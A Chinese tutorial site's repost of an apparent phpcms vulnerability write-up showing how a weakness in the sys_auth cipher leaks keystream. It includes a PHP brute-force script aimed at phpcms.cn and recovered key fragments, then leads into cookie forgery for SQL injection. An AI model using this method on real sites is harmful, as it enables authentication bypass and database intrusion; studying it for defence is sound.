来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] 加解密函数缺陷第三发,注入演示版本20140522无视全局防御搬个沙发吧。。这个比destoon那个要麻烦多了。。。先从函数说起phpcms libs functions global func php行335function sys_auth($string, $operatio...
加解密函数缺陷第三发,注入演示 先从函数说起 function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) { $key_length = 4; $key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key')); $fixedkey = md5($key); //keya 用于加解密 $egiskeys = md5(substr($fixedkey, 16, 16)); //keyb 用于数据完整性校验 $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : ''; //keyc(初始化向量iv) $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));//由keya和heyc组合而成 直接参与运算,这里叫keyd吧 $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length)); $i = 0; $result = ''; $string_length = strlen($string); for ($i = 0; $i < $string_length; $i++){ $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32})); //简化了dz的函数 直接用keyd和文本做异或 } if($operation == 'ENCODE') { return $runtokey . str_replace('=', '', base64_encode($result)); } else { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) { return substr($result, 26); } else { return ''; } } }
if($member_setting['enablemailcheck']) { pc_base::load_sys_func('mail'); $phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key')); $code = sys_auth($userid.'|'.$phpcms_auth_key, 'ENCODE', $phpcms_auth_key); $url = APP_PATH."index.php?m=member&c=index&a=register&code=$code&verify=1";
$phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key'));
sys_auth($userid.'|'.$phpcms_auth_key, 'ENCODE', $phpcms_auth_key);
if(strpos($f, 'http://') !== FALSE || strpos($f, 'ftp://') !== FALSE || strpos($f, '://') === FALSE) { $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT']); $a_k = urlencode(sys_auth("i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid, 'ENCODE', $pc_auth_key)); $downurl = '?m=content&c=down&a=download&a_k='.$a_k; } else { $downurl = $f; }
md5(pc_base::load_config('system','auth_key')."");
"i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid
<?php $url = "http://www.phpcms.cn/index.php?m=content&c=down&a_k=f7c8BFEHCVEIBVYGVQJYB1ADXFNSAAxRAgcHDw5eDlMCR0oJR1oEUB5TW14RFREMHB9cWhRdWQ4CBRxHUEdQC0BPWlpOQQBOARtTGRUJEVVeQ2dDWh0AT1U%2BZ2N%2BDx0cWhEfUFwHHwxXUQNaDAVcBRVTWUEKVwhQWg"; $reg = '#a_k=(.*?)\"#'; $code = array('7763','2bc5','8706','81b7','30a9','49e7','8731','9c2e','d007'); $i=0; for(;;){ $data = doGet($url); preg_match_all($reg, $data, $urls); if (in_array(substr($urls[1][0],0,4), $code)){ die($urls[1][0]); } $i++; echo $i."--".substr($urls[1][0],0,4)."\n"; } function doGet($url,$cookie=''){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); return $response; } ?>
ddefc0e197b7374b3>ge27f56ab70db0deefc0e1970cc61f?74a27ffb3b70db0ddefc0e1970cc62c574a27ffb3b70db0ddefc0e1970cc62c574a27ffb3b70db0dde
ddefc0e197b7374b3>ge27f56ab70db0 deefc0e1970cc61f?74a27ffb3b70db0 ddefc0e1970cc62c574a27ffb3b70db0 ddefc0e1970cc62c574a27ffb3b70db0 dde
拿到这个key之后就能干很多事了。这里以一个简单的注入来证明一下 $phpcms_auth = param::get_cookie('auth'); if($phpcms_auth) { $auth_key = md5(pc_base::load_config('system', 'auth_key').$_SERVER['HTTP_USER_AGENT']); list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key)); if($userid >0) { } else { exit(trim_script($_GET['callback']).'('.json_encode(array('status'=>-1)).')'); } } else { exit(trim_script($_GET['callback']).'('.json_encode(array('status'=>-1)).')'); } $favorite_db = pc_base::load_model('favorite_model'); $data = array('title'=>$title, 'url'=>$url, 'adddate'=>SYS_TIME, 'userid'=>$userid); //根据url判断是否已经收藏过。 $is_exists = $favorite_db->get_one(array('url'=>$url, 'userid'=>$userid));
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com